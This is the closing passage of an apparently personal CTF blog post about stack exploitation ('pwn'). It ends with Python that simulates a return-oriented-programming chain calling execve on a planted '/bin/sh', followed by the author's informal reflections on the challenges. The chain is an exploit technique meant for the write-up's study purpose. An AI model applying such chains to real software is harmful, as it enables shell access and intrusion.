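        elif pc == MOV_EDI_JMP_RAX:
            regs['rdi'] = 0x404008        # 32-bit mov zero-extends into rdi
            pc = regs['rax']              # jmp rax, which we aimed at a ret
        elif pc == MOV_ESI_EBP_SYSCALL:
            regs['rsi'] = regs['rbp'] & 0xffffffff
            return regs
        else:
            raise ValueError(hex(pc))

chain = [
    POP_RAX, RET,             # make jmp rax land on a ret
    MOV_EDI_JMP_RAX,          # rdi = 0x404008, where "/bin/sh" is planted
    POP_RBP, ARGV,            # rbp feeds esi
    POP_RAX, 0x3b,            # execve
    MOV_ESI_EBP_SYSCALL,
]
regs = run(chain)
print({k: hex(v) for k, v in regs.items()})
```

Since mov esi, ebp only copies 32 bits, the argv array has to live at a low address, which .bss conveniently is.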

eof

Anyways I think I have fucking had enough of stack pwn for the next year. Hope you enjoyed reading this blog post. Never forget that there is more to life than the Computer.

The average solve count for these challenges within their respective competitions is 0.33, which, honestly, yea fair. No one even touched my musl pwn I think. The thing about these challenges is that there is just enough variance in technique to be fun (it really is remarkable how many different ways you can attack such a tightly related kind of challenge, whether it be SROP, partial overwrites and such). You can basically do whatever the fuck you want, and there is a lot of joy in that.

Reward for reaching the end of this post